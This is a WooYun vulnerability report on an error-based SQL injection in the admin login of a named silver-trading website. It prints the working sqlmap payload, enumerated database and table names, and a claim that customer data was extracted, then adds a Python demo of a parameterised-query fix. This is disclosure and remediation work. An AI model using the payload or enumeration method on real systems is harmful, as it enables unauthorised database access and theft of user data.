
Vulnerability summary

Defect ID: wooyun-2016-0176567

Title: China Silver Network high-risk vulnerability: POST injection in the admin backend leaks large amounts of user data

Vendor: ex-silver.com

Author: 阿圣

Submitted: 2016-02-17 23:05

Fix time: 2016-02-22 23:10

Published: 2016-02-22 23:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2016-02-17: details sent to the vendor, awaiting the vendor's response
2016-02-22: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Admin backend: http://www.ex-silver.com/Admin/Login.aspx

Detailed description:

Request captured with Burp

(screenshot not included)


Enumerated the databases with sqlmap

(screenshot not included)


[22:03:05] [INFO] parsing HTTP request from 'post.txt'
[22:03:05] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:03:05] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Username (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Username=test' AND 1092=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1092=1092) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'qdEN'='qdEN&Password=123456a&loginyzm=kit6&cSubmit=true
---
[22:03:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[22:03:05] [INFO] fetching database names
[22:03:05] [INFO] the SQL query used returns 11 entries
[22:03:05] [INFO] resumed: exSilver
[22:03:05] [INFO] resumed: ex-silver_0727
[22:03:05] [INFO] resumed: ex-silver_0730
[22:03:05] [INFO] resumed: ex-silver_31
[22:03:05] [INFO] resumed: master
[22:03:05] [INFO] resumed: model
[22:03:05] [INFO] resumed: msdb
[22:03:05] [INFO] resumed: ReportServer
[22:03:05] [INFO] resumed: ReportServerTempDB
[22:03:05] [INFO] resumed: SnailCMS
[22:03:05] [INFO] resumed: tempdb
available databases [11]:
[*] ex-silver_0727
[*] ex-silver_0730
[*] ex-silver_31
[*] exSilver
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SnailCMS
[*] tempdb


The 116 tables in the exSilver database

Database: exSilver
[116 tables]
+-----------------------------+
| ActionLog |
| ActiveCustomers |
| Ad |
| Advertising |
| AnnualMeeting |
| Ballot |
| BallotIp |
| Banner |
| BuyInfo |
| CFTCSilver |
| CaiJinEvent |
| Calendar |
| CentralResult |
| ChangJIangColorNowPrice |
| ChinaCPI |
| ChinaGDP |
| ChinaPMI |
| ChinaPPI |
| ChinaSpend |
| Council |
| CountrySilver |
| CustAndNode |
| CustLevel |
| Customer |
| CustomerType |
| D99_CMD |
| D99_Tmp |
| DataBaiYinDingPanJia |
| DataDiaoJiZhongXin |
| DataDownload |
| DataGuiJinShuPrice |
| DataTouZiYinTiao |
| Englandbank |
| Europebank |
| Exchange |
| Famous |
| FedTable |
| FileInfo |
| FileType |
| FileTypeAndPersonnel |
| Fixedprice |
| Friendly |
| GSpotPrice |
| GoldETF |
| GoldETFStock |
| GoldProduction |
| Goldsupply |
| GuangDongSouthColorNowPrice |
| Guests |
| Holiday |
| HuaYin999 |
| HuaYin999_20150323 |
| Integrated |
| Investment |
| Japanbank |
| LevelInfo |
| LevelRole |
| Meeting |
| MenuPage |
| NetworkSelection |
| NetworkVoting |
| NewsKey |
| Nonferrous |
| OnlineCompany |
| OnlineUser |
| OuZhouWarGoldPrice |
| OuZhouWarSmallGold |
| PageWeb |
| PayAttention |
| PayAttentionOptions |
| Personnel |
| PersonnelFileType |
| PersonnelRole |
| PreviousMeeting |
| QuoteType |
| RealTimeQuotes |
| RegisterVip |
| Reportsummary |
| Research |
| Role |
| Rule |
| SellInfo |
| ShangHaiColorNowPrice |
| SilverData |
| SilverETF |
| SilverETF_20150617bak |
| SilverOutput |
| SilverOutputData |
| SilverPremium |
| Silveragio |
| Silverproduction |
| Silversupply |
| SoftwareDownload |
| Stock |
| SwapCenter |
| Template |
| ThematicInvestment |
| UKGDP |
| UsaAnnualGDP |
| UsaDataCentres |
| UsaHomesales |
| UsaIdleness |
| UsaPayrollsData |
| UsaPriceindex |
| UsaRetailsales |
| Userprice |
| V_SellInfo |
| WebNode |
| WebPage |
| Website_editor |
| applyfunc |
| base_price |
| business |
| pangolin_test_table |
| sqlmapoutput |
| yinfu |
+-----------------------------+

Proof of vulnerability:

Contents of the Customer table.

(screenshot not included)

Fix recommendation:

Strengthen input filtering and validation.

Copyright notice: when reproducing, credit the source: 阿圣@WooYun
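As an added illustration of the fix (not part of the report and not the site's code), the query pattern behind the finding is shown beside its parameterised replacement. The example uses an in-memory SQLite table as a stand-in for the SQL Server Customer table, with constructed column names (Id, Username, Salt, PwHash) and a constructed account; the only input taken from the report is the Username value sqlmap listed above. In the vulnerable function the value is pasted into the SQL text, so the quote closes the string literal and the rest of the value is parsed as SQL; the query then fails with a database error (SQLite has no CONVERT function, and on SQL Server the CONVERT itself raises the conversion error whose message carries the selected data, which is what error-based injection relies on). In the parameterised function the same value is bound as data and is simply a username that matches nothing.

```python
import hashlib
import hmac
import os
import sqlite3
from typing import Callable, Optional

# Username value from the sqlmap output in the report above (the other form
# fields and the '&' separators are dropped; only this value reaches the query).
SQLMAP_PAYLOAD = (
    "test' AND 1092=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(106)"
    "+CHAR(113)+(SELECT (CASE WHEN (1092=1092) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'qdEN'='qdEN"
)

Row = Optional[tuple]
LoginFn = Callable[[sqlite3.Connection, str, str], Optional[int]]


def hash_password(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256 password hash. The report says nothing about how the
    site stores passwords; a hash is simply what a login table should hold."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the Customer table: SQLite in memory, with
    columns chosen for this demo (the real table's layout is not in the report)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Customer (Id INTEGER PRIMARY KEY, Username TEXT UNIQUE, "
        "Salt BLOB NOT NULL, PwHash BLOB NOT NULL)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO Customer (Username, Salt, PwHash) VALUES (?, ?, ?)",
        ("alice", salt, hash_password("correct horse", salt)),
    )
    conn.commit()
    return conn


def _verify(row: Row, password: str) -> Optional[int]:
    """Return the user id if the supplied password matches the stored hash."""
    if row is None:
        return None
    user_id, salt, stored = row
    if hmac.compare_digest(hash_password(password, salt), stored):
        return user_id
    return None


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """The pattern behind the finding: the POST value is pasted into the SQL text.
    A quote in the username closes the string literal, the remainder is parsed
    as SQL, and the database error it provokes is what error-based injection
    reads data back from."""
    sql = f"SELECT Id, Salt, PwHash FROM Customer WHERE Username = '{username}'"
    return _verify(conn.execute(sql).fetchone(), password)


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Fix: bind the value as a parameter. The SQL text is fixed before the
    value is seen, so the username, quotes and all, is compared as data."""
    row = conn.execute(
        "SELECT Id, Salt, PwHash FROM Customer WHERE Username = ?", (username,)
    ).fetchone()
    return _verify(row, password)


def db_error_for(login: LoginFn, username: str, password: str = "123456a") -> Optional[str]:
    """Run one login attempt against a fresh table and return the database
    error message it produced, or None if the query ran cleanly."""
    try:
        login(make_db(), username, password)
        return None
    except sqlite3.Error as exc:
        return str(exc)


if __name__ == "__main__":
    print("legitimate user, safe :", safe_login(make_db(), "alice", "correct horse"))
    print("payload, safe         :", safe_login(make_db(), SQLMAP_PAYLOAD, "123456a"))
    print("payload, vulnerable   :", db_error_for(vulnerable_login, SQLMAP_PAYLOAD))
    print("payload, safe error?  :", db_error_for(safe_login, SQLMAP_PAYLOAD))
```

On the ASP.NET 4.0 / SQL Server stack the report identifies, the same change is a SqlCommand whose values are supplied through SqlParameter objects (or an ORM that does this for you) instead of string concatenation. The second half of the mitigation is to stop database error text from reaching the client, since error-based injection extracts data from the error message itself.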


Vulnerability response

Vendor response:

Severity: no impact (vendor ignored)

Ignored at: 2016-02-22 23:10

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet

